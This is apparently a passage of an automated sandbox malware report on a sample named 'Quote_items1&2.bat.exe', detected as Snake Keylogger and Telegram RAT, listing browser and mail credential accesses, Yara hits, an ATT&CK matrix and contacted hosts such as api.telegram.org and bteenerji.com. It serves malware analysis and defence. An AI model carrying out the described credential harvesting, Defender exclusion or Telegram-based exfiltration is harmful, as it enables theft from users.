                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wJFLKBSbTtvP.exe PID: 7352, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wJFLKBSbTtvP.exe PID: 7352, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job                		211
                Process Injection                		3
                Obfuscated Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job                		2
                Software Packing                		Security Account Manager11
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Process Discovery                		Distributed Component Object Model1
                Input Capture                		1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeylogging4
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                Virtualization/Sandbox Evasion                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input Capture25
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                Process Injection                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618378 Sample: Quote_items1&2.bat.exe Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 42 reallyfreegeoip.org 2->42 44 api.telegram.org 2->44 46 4 other IPs or domains 2->46 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 64 10 other signatures 2->64 8 Quote_items1&2.bat.exe 7 2->8         started        12 wJFLKBSbTtvP.exe 5 2->12         started        signatures3 60 Tries to detect the country of the analysis system (by using the IP) 42->60 62 Uses the Telegram API (likely for C&C communication) 44->62 process4 file5 34 C:\Users\user\AppData\...\wJFLKBSbTtvP.exe, PE32+ 8->34 dropped 36 C:\Users\...\wJFLKBSbTtvP.exe:Zone.Identifier, ASCII 8->36 dropped 38 C:\Users\user\AppData\Local\...\tmpC8F3.tmp, XML 8->38 dropped 40 C:\Users\user\...\Quote_items1&2.bat.exe.log, CSV 8->40 dropped 66 Uses schtasks.exe or at.exe to add and modify task schedules 8->66 68 Modifies the context of a thread in another process (thread injection) 8->68 70 Adds a directory exclusion to Windows Defender 8->70 14 Quote_items1&2.bat.exe 14 2 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        72 Multi AV Scanner detection for dropped file 12->72 74 Injects a PE file into a foreign processes 12->74 22 wJFLKBSbTtvP.exe 12->22         started        24 schtasks.exe 1 12->24         started        signatures6 process7 dnsIp8 48 bteenerji.com 78.135.65.4, 587, 64730, 64775 PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR Turkey 14->48 50 api.telegram.org 149.154.167.220, 443, 49917, 64747 TELEGRAMRU United Kingdom 14->50 52 2 other IPs or domains 14->52 76 Loading BitLocker PowerShell Module 18->76 26 WmiPrvSE.exe 18->26         started        28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Tries to harvest and steal browser information (history, passwords, etc) 22->80 32 conhost.exe 24->32         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.